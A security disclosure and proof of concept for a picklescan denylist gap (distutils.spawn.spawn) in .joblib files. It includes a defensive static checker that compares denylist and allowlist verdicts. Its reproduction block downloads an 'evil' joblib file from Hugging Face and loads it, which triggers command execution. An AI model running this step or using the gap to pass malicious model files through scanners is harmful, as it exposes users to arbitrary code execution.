distutils.spawn.spawn - picklescan bypass PoC (.joblib)
Security research PoC for huntr MFV submission.
Vulnerability: distutils.spawn.spawn is absent from picklescan's _unsafe_globals denylist.
A .joblib file embedding this gadget executes arbitrary shell commands while picklescan reports
issues=0, infected_files=0 (CLEAN).
Affected: picklescan ≤ 1.0.4 (latest), Python ≤ 3.11
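Added example (not part of the original PoC and not picklescan's code): a static check that lists the globals a pickle stream would import and compares a denylist verdict with an allowlist verdict, showing why a global missing from a denylist passes as clean. ALLOWED, SAMPLE_DENYLIST and both sample streams are constructed for this illustration, and the check assumes a plain pickle stream such as an uncompressed .joblib file.

```python
import collections
import pickle
import pickletools

# Assumed allowlist for this example: the only globals a model file may import.
ALLOWED = {("collections", "OrderedDict")}
# Constructed stand-in for a denylist that lacks the gadget named on this page
# (not picklescan's real _unsafe_globals).
SAMPLE_DENYLIST = {("os", "system"), ("subprocess", "Popen"), ("builtins", "eval")}

STRING_OPS = {"UNICODE", "SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8"}
UNRESOLVED = ("<unresolved>", "<unresolved>")


def referenced_globals(data: bytes):
    """List the (module, name) imports in a pickle stream without loading it."""
    found, run, memo = [], [], {}  # run = consecutive string pushes on the stack top
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in STRING_OPS:
            run.append(arg)
        elif name == "MEMOIZE":
            memo[len(memo)] = run[-1] if run else None
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = run[-1] if run else None
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            value = memo.get(arg)
            run = run + [value] if isinstance(value, str) else []
        elif name == "STACK_GLOBAL":
            # Resolve only when both operands are visible; otherwise fail closed.
            found.append(tuple(run[-2:]) if len(run) >= 2 else UNRESOLVED)
            run = []
        elif name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
            run = []
        elif name != "FRAME":  # any other opcode breaks the run of string pushes
            run = []
    return found


def audit(data: bytes):
    """Compare denylist and allowlist verdicts for the same stream."""
    refs = referenced_globals(data)
    return {
        "denylist_hits": [r for r in refs if r in SAMPLE_DENYLIST],
        "allowlist_violations": [r for r in refs if r not in ALLOWED],
    }


# Constructed inputs: a benign pickle, and a stream that only names the global
# from this page (GLOBAL + STOP, no call opcode). Neither is ever unpickled.
BENIGN = pickle.dumps(collections.OrderedDict(a=1), protocol=4)
REFERENCE_ONLY = b"cdistutils.spawn\nspawn\n."
```

audit(REFERENCE_ONLY) returns no denylist hits but one allowlist violation, while audit(BENIGN) is clean on both; a STACK_GLOBAL whose operands cannot be resolved is reported as a violation rather than skipped.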
Reproduction
pip3 install joblib picklescan
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
path = hf_hub_download('th3-j0k3r/distutils-spawn-picklescan-bypass', 'evil_distutils.joblib')
import io
from picklescan.scanner import scan_bytes
data = open(path,'rb').read()
r = scan_bytes(io.BytesIO(data), 'evil_distutils.joblib')
print('picklescan result: issues=%d infected=%d' % (r.issues_count, r.infected_files))
joblib.load(path)
"